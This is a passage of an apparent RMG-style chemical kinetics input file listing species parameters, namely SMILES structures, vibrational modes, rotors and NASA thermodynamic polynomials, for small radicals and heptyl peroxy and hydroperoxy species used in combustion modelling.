thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.307683,0.102087,-0.000101217,6.59004e-08,-1.9306e-11,2829.86,35.3038], Tmin=(100,'K'), Tmax=(797.655,'K')), NASAPolynomial(coeffs=[7.35057,0.0636835,-2.89977e-05,5.54111e-09,-3.88302e-13,1608.13,0.0884967], Tmin=(797.655,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(22.2936,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(527.969,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(C2CsJOOH)"""),
)
species(
label = 'C2H5(32)',
structure = SMILES('C[CH2]'),
E0 = (107.874,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2800,2850,1350,1500,750,1050,1375,1000,1190.59,1642.33,1643.48,3621.68,3622.96],'cm^-1')),
HinderedRotor(inertia=(0.866827,'amu*angstrom^2'), symmetry=1, barrier=(19.9301,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (29.0611,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(2097.75,'J/mol'), sigma=(4.302,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.5, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.24186,-0.00356905,4.82667e-05,-5.85401e-08,2.25805e-11,12969,4.44704], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[4.32196,0.0123931,-4.39681e-06,7.0352e-10,-4.18435e-14,12175.9,0.171104], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(107.874,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(153.818,'J/(mol*K)'), label="""C2H5""", comment="""Thermo library: FFCM1(-)"""),
)
species(
label = '[CH2]C(CCC)O[O](145)',
structure = SMILES('[CH2]C(CCC)O[O]'),
E0 = (96.9176,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2783.33,2816.67,2850,1425,1450,1225,1275,1270,1340,700,800,300,400,2750,2800,2850,1350,1500,750,1050,1375,1000,492.5,1135,1000,1380,1390,370,380,2900,435,408.322,408.323],'cm^-1')),
HinderedRotor(inertia=(0.0665327,'amu*angstrom^2'), symmetry=1, barrier=(7.87169,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0665327,'amu*angstrom^2'), symmetry=1, barrier=(7.8717,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0665327,'amu*angstrom^2'), symmetry=1, barrier=(7.8717,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0665328,'amu*angstrom^2'), symmetry=1, barrier=(7.8717,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.0665326,'amu*angstrom^2'), symmetry=1, barrier=(7.8717,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (102.132,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.761829,0.0732135,-6.43673e-05,3.2225e-08,-6.86802e-12,11771.4,29.3513], Tmin=(100,'K'), Tmax=(1094.49,'K')), NASAPolynomial(coeffs=[10.3082,0.0383245,-1.65516e-05,3.0998e-09,-2.1529e-13,9681.74,-17.5663], Tmin=(1094.49,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(96.9176,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(386.623,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(CJCOOH)"""),
)
species(
label = 'CC[CH]C(CCC)O[O](146)',
structure = SMILES('CC[CH]C(CCC)O[O]'),
E0 = (35.8095,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (130.185,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.308665,0.100406,-8.84314e-05,4.61229e-08,-1.05358e-11,4457.31,38.0039], Tmin=(100,'K'), Tmax=(1010.26,'K')), NASAPolynomial(coeffs=[10.3052,0.0583815,-2.60341e-05,4.94683e-09,-3.46273e-13,2312.78,-13.3102], Tmin=(1010.26,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(35.8095,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(527.969,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(CCJCOOH) + radical(ROOJ)"""),
)
species(
label = '[CH2]CC(CCC)O[O](147)',
structure = SMILES('[CH2]CC(CCC)O[O]'),
E0 = (64.4211,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2800,2850,1350,1500,750,1050,1375,1000,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (116.158,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.305339,0.0849559,-7.17251e-05,3.49657e-08,-7.40173e-12,7878,33.0286], Tmin=(100,'K'), Tmax=(1086.3,'K')), NASAPolynomial(coeffs=[10.2215,0.0484424,-2.13058e-05,4.02302e-09,-2.80588e-13,5723.63,-15.6317], Tmin=(1086.3,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(64.4211,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(457.296,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(RCCJ)"""),
)
species(
label = 'CH3(18)',
structure = SMILES('[CH3]'),
E0 = (136.188,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([604.263,1333.71,1492.19,2836.77,2836.77,3806.92],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (15.0345,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.65718,0.0021266,5.45839e-06,-6.6181e-09,2.46571e-12,16422.7,1.67354], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.97812,0.00579785,-1.97558e-06,3.07298e-10,-1.79174e-14,16509.5,4.72248], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(136.188,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(83.1447,'J/(mol*K)'), label="""CH3""", comment="""Thermo library: FFCM1(-)"""),
)
species(
label = 'C[CH]CC(CCC)O[O](148)',
structure = SMILES('C[CH]CC(CCC)O[O]'),
E0 = (29.8408,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (130.185,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.222128,0.099523,-9.48843e-05,5.89934e-08,-1.65158e-11,3735.18,38.13], Tmin=(100,'K'), Tmax=(831.502,'K')), NASAPolynomial(coeffs=[7.49589,0.0623944,-2.79046e-05,5.29089e-09,-3.69296e-13,2451.69,2.31923], Tmin=(831.502,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(29.8408,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(527.969,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(RCCJC)"""),
)
species(
label = '[CH2]CCC(CCC)O[O](149)',
structure = SMILES('[CH2]CCC(CCC)O[O]'),
E0 = (40.6409,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,2750,2800,2850,1350,1500,750,1050,1375,1000,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 3,
opticalIsomers = 1,
molecularWeight = (130.185,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.31089,0.0993682,-8.4228e-05,4.1255e-08,-8.78157e-12,5039.37,37.4872], Tmin=(100,'K'), Tmax=(1080.2,'K')), NASAPolynomial(coeffs=[11.1942,0.0567646,-2.5067e-05,4.74259e-09,-3.31152e-13,2553.82,-18.9057], Tmin=(1080.2,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(40.6409,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(527.969,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ) + radical(RCCJ)"""),
)
species(
label = 'CH2(S)(24)',
structure = SMILES('[CH2]'),
E0 = (418.921,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1358.21,2621.43,3089.55],'cm^-1')),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (14.0266,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(1197.29,'J/mol'), sigma=(3.8,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.19331,-0.00233105,8.15676e-06,-6.62986e-09,1.93233e-12,50366.2,-0.746734], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[3.13502,0.00289594,-8.16668e-07,1.13573e-10,-6.36263e-15,50504.1,4.06031], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(418.921,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""CH2(S)""", comment="""Thermo library: FFCM1(-)"""),
)
species(
label = 'CCCC(CC)O[O](150)',
structure = SMILES('CCCC(CC)O[O]'),
E0 = (-140.825,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,492.5,1135,1000,1380,1390,370,380,2900,435,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (117.166,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.21933,0.0849261,-6.42064e-05,2.69561e-08,-4.88243e-12,-16803,31.5405], Tmin=(100,'K'), Tmax=(1248.35,'K')), NASAPolynomial(coeffs=[11.4159,0.0490497,-2.10977e-05,3.93422e-09,-2.71954e-13,-19598.4,-24.9599], Tmin=(1248.35,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-140.825,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(482.239,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(ROOJ)"""),
)
species(
label = 'CCC[C](CCC)OO(139)',
structure = SMILES('CCC[C](CCC)OO'),
E0 = (-129.711,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.331826,0.102878,-8.67857e-05,4.38793e-08,-9.97788e-12,-15451,34.63], Tmin=(100,'K'), Tmax=(996.253,'K')), NASAPolynomial(coeffs=[9.10012,0.0650087,-2.97678e-05,5.72457e-09,-4.0335e-13,-17330.4,-10.8383], Tmin=(996.253,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-129.711,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(548.755,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(C2CsJOOH)"""),
)
species(
label = 'CC[CH]C(CCC)OO(140)',
structure = SMILES('CC[CH]C(CCC)OO'),
E0 = (-116.195,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3025,407.5,1350,352.5,2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,3615,1310,387.5,850,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.541478,0.103807,-8.37226e-05,3.74479e-08,-7.20635e-12,-13815,38.067], Tmin=(100,'K'), Tmax=(1185.08,'K')), NASAPolynomial(coeffs=[12.9953,0.058117,-2.5892e-05,4.91572e-09,-3.43586e-13,-17023.5,-29.5387], Tmin=(1185.08,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-116.195,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(548.755,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(CCJCOOH)"""),
)
species(
label = 'C[CH]CC(CCC)OO(141)',
structure = SMILES('C[CH]CC(CCC)OO'),
E0 = (-122.164,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.289445,0.100884,-8.27272e-05,4.0318e-08,-8.7966e-12,-14544,37.6068], Tmin=(100,'K'), Tmax=(1036.34,'K')), NASAPolynomial(coeffs=[9.41781,0.0634168,-2.84961e-05,5.43144e-09,-3.80742e-13,-16555.9,-9.57154], Tmin=(1036.34,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-122.164,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(548.755,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(RCCJC)"""),
)
species(
label = '[CH2]CCC(CCC)OO(142)',
structure = SMILES('[CH2]CCC(CCC)OO'),
E0 = (-111.364,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,2750,2800,2850,1350,1500,750,1050,1375,1000,3615,1310,387.5,850,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.603592,0.103441,-8.16947e-05,3.51448e-08,-6.43845e-12,-13230.4,37.7671], Tmin=(100,'K'), Tmax=(1246.47,'K')), NASAPolynomial(coeffs=[14.1561,0.056077,-2.46975e-05,4.66063e-09,-3.24428e-13,-16909.9,-36.6921], Tmin=(1246.47,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-111.364,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(548.755,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(RCCJ)"""),
)
species(
label = 'CCC=CCCC(122)',
structure = SMILES('CCC=CCCC'),
E0 = (-98.9731,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,2995,3025,975,1000,1300,1375,400,500,1630,1680,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (98.1861,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.516528,0.0646821,-1.31158e-05,-1.94274e-08,9.49365e-12,-11768.3,29.5503], Tmin=(100,'K'), Tmax=(1093.68,'K')), NASAPolynomial(coeffs=[12.5234,0.0444655,-1.78892e-05,3.29347e-09,-2.28557e-13,-15811.9,-35.9302], Tmin=(1093.68,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-98.9731,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(486.397,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-CsCsHH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH)"""),
)
species(
label = 'HO2(10)',
structure = SMILES('[O]O'),
E0 = (2.67648,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1112.8,1388.53,3298.45],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (33.0067,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(892.977,'J/mol'), sigma=(3.458,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
